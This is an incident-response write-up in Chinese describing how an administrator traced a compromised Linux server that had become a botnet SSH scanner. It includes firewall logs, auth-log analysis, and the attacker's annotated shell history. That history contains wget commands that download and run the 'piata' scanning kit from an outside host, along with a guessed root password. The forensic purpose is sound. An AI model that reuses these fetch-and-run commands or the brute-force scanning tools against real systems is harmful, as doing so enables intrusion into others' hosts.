?1、從防火墻癱瘓說(shuō)起

今天還沒(méi)到公司就被電話告知辦公室無(wú)法正常連接互聯(lián)網(wǎng)了，網(wǎng)速非常慢，無(wú)法正常瀏覽網(wǎng)頁(yè)。急急忙忙感到公司，開(kāi)始查找問(wèn)題。

首先排除了交換機(jī)故障，因?yàn)閮?nèi)部局域網(wǎng)正常。當(dāng)ping防火墻設(shè)備時(shí)，丟包嚴(yán)重。很明顯，防火墻出了問(wèn)題，撐不住了，其Web管理界面根本無(wú)法正常登陸。立即聯(lián)系其服務(wù)商遠(yuǎn)程查找問(wèn)題，經(jīng)過(guò)近3個(gè)小時(shí)的分析，得出結(jié)論是網(wǎng)內(nèi)有兩臺(tái)

主機(jī)A配置如下：

OS?-?RedHat?Enterprise?Linux?Server?release?6.x?
部署軟件?-?Tomcat，sshd,?oracle?
RAM?-?8GB?
CPU?-?Intel?Core?i3-2130?
IP地址?-?172.16.111.22?

主機(jī)B為客戶托管主機(jī)，具體配置不詳。

本文只對(duì)主機(jī)A進(jìn)行分析處理。

通過(guò)防火墻命令行界面，抓包發(fā)現(xiàn)A機(jī)器瘋狂對(duì)一組IP地址進(jìn)行22端口掃描。下面是抓包結(jié)果片段：

proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22,?packet=3,?bytes=208[REPLY]?183.58.99.130:22=====>59.46.161.39:39895,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22,?packet=3,?bytes=208[REPLY]?183.58.99.131:22=====>59.46.161.39:33967,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22,?packet=3,?bytes=208[REPLY]?183.58.99.132:22=====>59.46.161.39:34117,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22,?packet=3,?bytes=208[REPLY]?183.58.99.125:22=====>59.46.161.39:54932,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22,?packet=3,?bytes=208[REPLY]?183.58.99.135:22=====>59.46.161.39:60333,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22,?packet=3,?bytes=208[REPLY]?183.58.99.136:22=====>59.46.161.39:52737,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22,?packet=3,?bytes=208[REPLY]?183.58.99.137:22=====>59.46.161.39:52291,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22,?packet=3,?bytes=208[REPLY]?183.58.99.138:22=====>59.46.161.39:46183,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22,?packet=3,?bytes=208[REPLY]?183.58.99.139:22=====>59.46.161.39:36864,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22,?packet=3,?bytes=208[REPLY]?183.58.99.133:22=====>59.46.161.39:34515,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22,?packet=3,?bytes=208[REPLY]?183.58.99.134:22=====>59.46.161.39:57121,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22,?packet=3,?bytes=208[REPLY]?183.58.99.140:22=====>59.46.161.39:37830,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22,?packet=3,?bytes=208[REPLY]?183.58.99.141:22=====>59.46.161.39:42742,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22,?packet=3,?bytes=208[REPLY]?183.58.99.142:22=====>59.46.161.39:55018,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22,?packet=3,?bytes=208[REPLY]?183.58.99.143:22=====>59.46.161.39:46447,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22,?packet=3,?bytes=208[REPLY]?183.58.99.147:22=====>59.46.161.39:51039,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22,?packet=3,?bytes=208[REPLY]?183.58.99.146:22=====>59.46.161.39:33123,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22,?packet=3,?bytes=208[REPLY]?183.58.99.151:22=====>59.46.161.39:35956,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22,?packet=3,?bytes=208[REPLY]?183.58.99.145:22=====>59.46.161.39:45002,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22,?packet=3,?bytes=208[REPLY]?183.58.99.150:22=====>59.46.161.39:54711,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22,?packet=3,?bytes=208[REPLY]?183.58.99.155:22=====>59.46.161.39:58976,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22,?packet=3,?bytes=208[REPLY]?183.58.99.157:22=====>59.46.161.39:37967,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22,?packet=3,?bytes=208[REPLY]?183.58.99.158:22=====>59.46.161.39:47125,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22,?packet=3,?bytes=208[REPLY]?183.58.99.156:22=====>59.46.161.39:35028,?packet=0,?bytes=0?

可以清晰的看到，肉雞掃描程序瘋狂掃描一個(gè)網(wǎng)段內(nèi)的22端口。

2、查找黑客行蹤的方法

對(duì)于Linux主機(jī)，出現(xiàn)問(wèn)題后分析和處理的依據(jù)主要是日志。/var/log/messages、/var/log/secure都是必不可少的分析目標(biāo)，然后就是.bash_history命令記錄。黑客登錄主機(jī)必然會(huì)在日志中留下記錄，高級(jí)黑客也許可以刪除痕跡，但目前大部分黑客都是利用現(xiàn)成工具的黑心者，并無(wú)太多技術(shù)背景。該主機(jī)對(duì)外開(kāi)放三個(gè)TCP偵聽(tīng)端口：

22?sshd?
80?Tomcat?
1521?Oracle?

這三個(gè)服務(wù)都有可能存在漏洞而被攻擊，最容易被掃描攻擊的還是sshd用戶名密碼被破解。所以最先分析 /var/log/secure日志，看登錄歷史。

3、淪陷過(guò)程分析

3.1 oracle用戶密碼被破解

分析/var/log/secure日志。不看不知道一看嚇一跳，該日志已經(jīng)占用了四個(gè)文件，每個(gè)文件都記錄了大量嘗試登錄的情況，執(zhí)行命令：

cat?secure-20150317?|?grep?'Failed?password'?|?cut?-d?"?"?-f?9,10,11?|?sort?|?uniq?

結(jié)果如下：

invalid?user?admin??
invalid?user?dacx??
invalid?user?details3??
invalid?user?drishti??
invalid?user?ferreluque??
invalid?user?git??
invalid?user?hall??
invalid?user?jparksu??
invalid?user?last??
invalid?user?patrol??
invalid?user?paul??
invalid?user?pgadmin??
invalid?user?postgres??
invalid?user?public??
invalid?user?sauser??
invalid?user?siginspect??
invalid?user?sql??
invalid?user?support??
invalid?user?sys??
invalid?user?sysadmin??
invalid?user?system??
invalid?user?taz??
invalid?user?test??
invalid?user?tiptop??
invalid?user?txl5460??
invalid?user?ubnt??
invalid?user?www??
mysql?from?10.10.10.1??
oracle?from?10.10.10.1??
root?from?10.10.10.1?

可以看出攻擊程序不斷采用不同的賬戶和密碼進(jìn)行嘗試。然后在接近尾部的地方發(fā)現(xiàn)如下2行，說(shuō)明被攻破了。

Mar?9?20:35:30?localhost?sshd[30379]:?Accepted?password?for?oracle?from?10.10.10.1?port?56906?ssh2?
Mar?9?20:35:30?localhost?sshd[30379]:?pam_unix(sshd:session):?session?opened?for?user?oracle?by?(uid=0)?

可見(jiàn)賬戶oracle的密碼被猜中，并成功登入系統(tǒng)。

3.2 黑客動(dòng)作推演

下面看看黑客用oracle賬戶都做了什么。首先復(fù)制一份oracle的命令歷史，防止后續(xù)操作丟失該記錄。

cp?/home/oracle/.bash_history?hacker_history?

然后查看分析這個(gè)文件。 我在后面?zhèn)渥⒘撕诳偷南敕ā?/p>

vi?.bash_profile?
vi?.bash_profile?（查看.bash_profile，看變量設(shè)置，把/home/oracle/bin增加到PATH）?
ll?
cd?/?
vi?.bash_profile?
vi?.bash_profile?(執(zhí)行，設(shè)置環(huán)境變量）?
w?
ps?x?（查看系統(tǒng)運(yùn)行進(jìn)程）?
free?-m?（查看內(nèi)存大小）?
uname?-a?（查看系統(tǒng)版本）?
cat?/etc/issue?（查看系統(tǒng)發(fā)行版）?
cat?/etc/hosts?（查看是否有網(wǎng)內(nèi)機(jī)器)?
cat?/proc/cpuinfo?（查看CPU型號(hào)）?
cat?.bash_history?（查看oracle賬戶歷史操作）?
w?（查看系統(tǒng)負(fù)載）?
ls?-a?（查看/home/oracle/下的隱藏文件）?
passwd?（修改掉oracle賬戶的密碼）?
exit??
ls??
oracle?
sqlplus?（運(yùn)行sqlplus)?
su?(試圖切換到root賬戶）?
app1123456?（猜測(cè)root密碼）?
ls??
su?-?
w?
free?-m?
php?-v?（查看php版本）?
exit?
w?
free?-m?
php?-v?
ps?aux?
ls?-a?
exit?
w?
free?-m?
php?-v?
cat?bash_his?（查看歷史命令）?
cat?bash_history?
cat?.bash_history?
wget?scriptcoders.ucoz.com/piata.tgz?（下載肉雞攻擊軟件包）?
tar?zxvf?piata.tgz?（解壓軟件包）?
rm?-rf?piata.tgz?（刪除軟件包）?
cd?piata/?（切換到攻擊軟件目錄）?
ls?-a?
chmod?+x?*?
./a?210.212?（運(yùn)行攻擊軟件）?
screen?（試圖運(yùn)行screen命令，發(fā)現(xiàn)沒(méi)有后下載它）?
ls?-a?
wget?scriptcoders.ucoz.com/screen.tgz?
tar?zxvf?screen.tgz?（解壓）?
./screen?
exit?
w?
ps?x?
cd?piata/?（切換到攻擊軟件目錄）?
ls?-a?
cat?vuln.txt?（查看攻擊結(jié)果）?
ls?-a?
mv?vuln.txt?1.txt?（保存攻擊結(jié)果）?
./screen?-r?
nano?1.txt?（查看結(jié)果文件）?
w?
ps?x?
exit?
cd?piata?
ps?x?
ls?-a?
nano?2.txt?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat??
mv?vuln.txt?2.txt?（保存結(jié)果）?
nano?2.txt?
w?
ps?x?
cd?piata/?
ls-?a?
cat?vuln.txt??
rm?-rf?vuln.txt??
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
ls?-a?
mv?vuln.txt?3.txt?（保存結(jié)果）?
nano?3.txt??
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
rm?-rf?1.txt??
rm?-rf?2.txt?
rm?-rf?2.txt.save??
rm?-rf?3.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
ls?-a?
nano?vuln.txt??
rm?-rf?vuln.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
nano?vuln.txt??
w?
ls?-a?
rm?-rf?vuln.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
ps?x?
ls?-a?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
nano?vuln.txt??
w?
rm?-rf?vuln.txt??
./screen?-r?
exit?

3.3 攻擊工具一覽

前面通過(guò)命令歷史記錄，可以看出攻擊工具軟件包為名為piata。下載來(lái)看看它的面目。

[root@localhost?piata]#?ll?
total?1708?
-rw-r--r--.?1?oracle?oinstall?0?Mar?10?13:01?183.63.pscan.22?
-rwxr-xr-x.?1?oracle?oinstall?659?Feb?2?2008?a?
-rwxr-xr-x.?1?oracle?oinstall?216?May?18?2005?auto?
-rwxr-xr-x.?1?oracle?oinstall?283?Nov?25?2004?gen-pass.sh?
-rwxr-xr-x.?1?oracle?oinstall?93?Apr?19?2005?go.sh?
-rwxr-xr-x.?1?oracle?oinstall?3253?Mar?5?2007?mass?
-rwxr-xr-x.?1?oracle?oinstall?12671?May?18?2008?pass_file?
-rwxr-xr-x.?1?oracle?oinstall?21407?Jul?22?2004?pscan2?
-rwxr-xr-x.?1?oracle?oinstall?249980?Feb?13?2001?screen?
-rw-r--r--.?1?oracle?oinstall?130892?Feb?3?2010?screen.tgz?
-rwxr-xr-x.?1?oracle?oinstall?453972?Jul?13?2004?ss?
-rwxr-xr-x.?1?oracle?oinstall?842736?Nov?24?2004?ssh-scan?
-rw-r--r--.?1?oracle?oinstall?2392?Mar?10?05:03?vuln.txt?

其中 a, auto, go.sh gen-pass.sh, 都是bash腳本文件，用于配置掃描網(wǎng)段，調(diào)用掃描程序。pscan2和ssh-scan則為掃描程序。 vuln.txt記錄獲得的肉雞列表。

目前尚未發(fā)現(xiàn)其他系統(tǒng)文件被黑客修改，也沒(méi)有自動(dòng)運(yùn)行攻擊軟件的設(shè)置。

4 深刻教訓(xùn)

雖然這次被攻擊的機(jī)器只是一個(gè)測(cè)試主機(jī)，其本身的重要性并不高，但卻造成了防火墻的癱瘓，進(jìn)而造成互聯(lián)網(wǎng)不能正常訪問(wèn)。對(duì)此，必須引起足夠重視，并從中汲取教訓(xùn)。

系統(tǒng)賬戶密碼一定要有一定的復(fù)雜度。這次攻擊就是由于oracle賬戶密碼過(guò)于簡(jiǎn)單所致。

sshd采用密碼方式登錄風(fēng)險(xiǎn)很大，特別是密碼簡(jiǎn)單的時(shí)候?？尚械那闆r下，盡量關(guān)閉密碼方式，改用公鑰方式。

作為數(shù)據(jù)中心管理員，一定要監(jiān)督監(jiān)管系統(tǒng)管理員和軟件開(kāi)發(fā)商的服務(wù)安全，本次被攻擊主機(jī)就是把所有權(quán)限都放給了網(wǎng)站開(kāi)發(fā)公司，而開(kāi)發(fā)公司對(duì)運(yùn)營(yíng)安全并不重視。

本文標(biāo)題：一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程！
標(biāo)題路徑：http://www.rwnh.cn/news9/99009.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供建站公司、ChatGPT、網(wǎng)頁(yè)設(shè)計(jì)公司、品牌網(wǎng)站建設(shè)、網(wǎng)站營(yíng)銷、動(dòng)態(tài)網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)